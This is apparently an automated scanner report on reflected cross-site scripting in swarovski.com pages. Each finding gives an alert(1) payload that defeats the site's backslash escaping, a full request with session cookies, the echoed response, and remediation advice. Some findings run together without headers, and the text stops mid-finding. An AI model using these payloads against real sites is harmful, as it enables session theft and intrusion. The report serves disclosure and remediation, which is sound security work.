Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.swarovski.com/Web_US/en/01/category/Jewellery.html [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/01/category/Jewellery.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d966\'%3balert(1)//2712df2315d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d966\\';alert(1)//2712df2315d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/01/category/Jewellery.html?5d966\'%3balert(1)//2712df2315d=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CategoryPage-ViewPage', query: '5d966\\';alert(1)//2712df2315d=1&CatalogCategoryName=01&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call li ...[SNIP]...
1.2. http://www.swarovski.com/Web_US/en/0112/category/Jewellery/Rings.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/0112/category/Jewellery/Rings.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d54f\'%3balert(1)//827fd1d9704 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d54f\\';alert(1)//827fd1d9704 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/0112/category/Jewellery/Rings.html?3d54f\'%3balert(1)//827fd1d9704=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CategoryPage-ViewPage', query: '3d54f\\';alert(1)//827fd1d9704=1&CatalogCategoryName=0112&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call
...[SNIP]...
1.3. http://www.swarovski.com/Web_US/en/02/category/Fashion_Accessories.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/02/category/Fashion_Accessories.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaee8\'%3balert(1)//fc48743c5ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aaee8\\';alert(1)//fc48743c5ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/02/category/Fashion_Accessories.html?aaee8\'%3balert(1)//fc48743c5ec=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CategoryPage-ViewPage', query: 'aaee8\\';alert(1)//fc48743c5ec=1&CatalogCategoryName=02&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call li ...[SNIP]...
1.4. http://www.swarovski.com/Web_US/en/03/category/Watches.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/03/category/Watches.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68fe7\'%3balert(1)//93893839f95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68fe7\\';alert(1)//93893839f95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/03/category/Watches.html?68fe7\'%3balert(1)//93893839f95=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CategoryPage-ViewPage', query: '68fe7\\';alert(1)//93893839f95=1&CatalogCategoryName=03&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call li ...[SNIP]...
1.5. http://www.swarovski.com/Web_US/en/06/category/Home_Accessories.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/06/category/Home_Accessories.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19db5\'%3balert(1)//d9c80cd877e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19db5\\';alert(1)//d9c80cd877e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/06/category/Home_Accessories.html?19db5\'%3balert(1)//d9c80cd877e=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CategoryPage-ViewPage', query: '19db5\\';alert(1)//d9c80cd877e=1&CatalogCategoryName=06&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call li ...[SNIP]...
1.6. http://www.swarovski.com/Web_US/en/07/category/Figurines.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/07/category/Figurines.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17808\'%3balert(1)//aa7283160eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17808\\';alert(1)//aa7283160eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/07/category/Figurines.html?17808\'%3balert(1)//aa7283160eb=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_CategoryPage-ViewPage', query: '17808\\';alert(1)//aa7283160eb=1&CatalogCategoryName=07&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call li ...[SNIP]...
1.7. http://www.swarovski.com/Web_US/en/08/category/Charms.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/08/category/Charms.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e39e0\'%3balert(1)//d033c11050f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e39e0\\';alert(1)//d033c11050f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/08/category/Charms.html?e39e0\'%3balert(1)//d033c11050f=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8cd7\'%3balert(1)//a08a6f4ff1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8cd7\\';alert(1)//a08a6f4ff1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/1062669/product/Mila_Pierced_Earrings.html?a8cd7\'%3balert(1)//a08a6f4ff1b=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17386\'%3balert(1)//82cb96eda6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17386\\';alert(1)//82cb96eda6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/91006/promotion/SCS_Member_Shopping.html?17386\'%3balert(1)//82cb96eda6a=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_HLSPage-ViewPage', query: '17386\\';alert(1)//82cb96eda6a=1&CatalogCategoryName=91006&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call
...[SNIP]...
1.10. http://www.swarovski.com/Web_US/en/91105/promotion/Unique_gifts.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/91105/promotion/Unique_gifts.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd542\'%3balert(1)//031166322cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd542\\';alert(1)//031166322cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/91105/promotion/Unique_gifts.html?fd542\'%3balert(1)//031166322cc=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_HLSPage-ViewPage', query: 'fd542\\';alert(1)//031166322cc=1&CatalogCategoryName=91105&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call
...[SNIP]...
1.11. http://www.swarovski.com/Web_US/en/91106/promotion/Festive_jewellery___________.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9244a\'%3balert(1)//61b4ddd52c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9244a\\';alert(1)//61b4ddd52c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
